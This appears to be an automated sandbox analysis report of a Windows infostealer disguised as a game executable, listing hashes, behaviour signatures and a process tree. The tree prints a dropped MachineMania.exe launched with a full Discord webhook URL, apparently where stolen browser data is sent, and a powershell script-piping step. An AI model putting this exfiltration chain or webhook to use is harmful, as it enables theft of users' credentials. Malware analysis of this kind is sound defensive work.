Resubmissions
20-02-2022 18:04
220220-wnqp3sbeh6 8Analysis
-
max time kernel
130s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
20-02-2022 18:04
Static task
static1
Behavioral task
behavioral1
Sample
Fruit_of_the_ace_v3.11.99.exe
Resource
win10v2004-en-20220113
0 signatures
0 seconds
General
-
Target
Fruit_of_the_ace_v3.11.99.exe
-
Size
37.7MB
-
MD5
4f709e1c6951bbd65d03a9f44961e0ae
-
SHA1
b228bc6e3572f714ace26b19b9383691684e18f2
-
SHA256
f266a09389e628b992560b33d50f91f022a89976cc80fa580cf780c40a74c9fa
-
SHA512
e1a67c87bbde1b7615d3d8321734d9d4ad7a3a626b8912b27b28f4c2c85ddf85162edc62b40b7cf9377936c2d90b63a9b676a546a1ce50417e4ec32460802e7d
Score
8/10
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2360 MachineMania.exe 408 MachineMania.exe -
Loads dropped DLL 43 IoCs
pid Process 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe 408 MachineMania.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 408 MachineMania.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x000600000001e72d-147.dat pyinstaller behavioral1/files/0x000600000001e72d-148.dat pyinstaller behavioral1/files/0x000600000001e72d-149.dat pyinstaller -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2408 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2700 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe Token: SeShutdownPrivilege 3684 svchost.exe Token: SeCreatePagefilePrivilege 3684 svchost.exe Token: SeShutdownPrivilege 3684 svchost.exe Token: SeCreatePagefilePrivilege 3684 svchost.exe Token: SeShutdownPrivilege 3684 svchost.exe Token: SeCreatePagefilePrivilege 3684 svchost.exe Token: SeDebugPrivilege 2408 tasklist.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4708 wrote to memory of 4848 4708 Fruit_of_the_ace_v3.11.99.exe 84 PID 4708 wrote to memory of 4848 4708 Fruit_of_the_ace_v3.11.99.exe 84 PID 4848 wrote to memory of 1676 4848 cmd.exe 85 PID 4848 wrote to memory of 1676 4848 cmd.exe 85 PID 4848 wrote to memory of 2700 4848 cmd.exe 86 PID 4848 wrote to memory of 2700 4848 cmd.exe 86 PID 2700 wrote to memory of 3068 2700 powershell.exe 87 PID 2700 wrote to memory of 3068 2700 powershell.exe 87 PID 3068 wrote to memory of 4780 3068 csc.exe 88 PID 3068 wrote to memory of 4780 3068 csc.exe 88 PID 4708 wrote to memory of 1736 4708 Fruit_of_the_ace_v3.11.99.exe 99 PID 4708 wrote to memory of 1736 4708 Fruit_of_the_ace_v3.11.99.exe 99 PID 1736 wrote to memory of 2408 1736 cmd.exe 100 PID 1736 wrote to memory of 2408 1736 cmd.exe 100 PID 4708 wrote to memory of 2360 4708 Fruit_of_the_ace_v3.11.99.exe 102 PID 4708 wrote to memory of 2360 4708 Fruit_of_the_ace_v3.11.99.exe 102 PID 2360 wrote to memory of 408 2360 MachineMania.exe 103 PID 2360 wrote to memory of 408 2360 MachineMania.exe 103 PID 408 wrote to memory of 2232 408 MachineMania.exe 104 PID 408 wrote to memory of 2232 408 MachineMania.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe"C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykbsf0td\ykbsf0td.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5040.tmp" "c:\Users\Admin\AppData\Local\Temp\ykbsf0td\CSCA9DC94F555734AE583938D65AC21D0AE.TMP"5⤵PID:4780
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\MachineMania.exeC:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\MachineMania.exeC:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:2232
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3684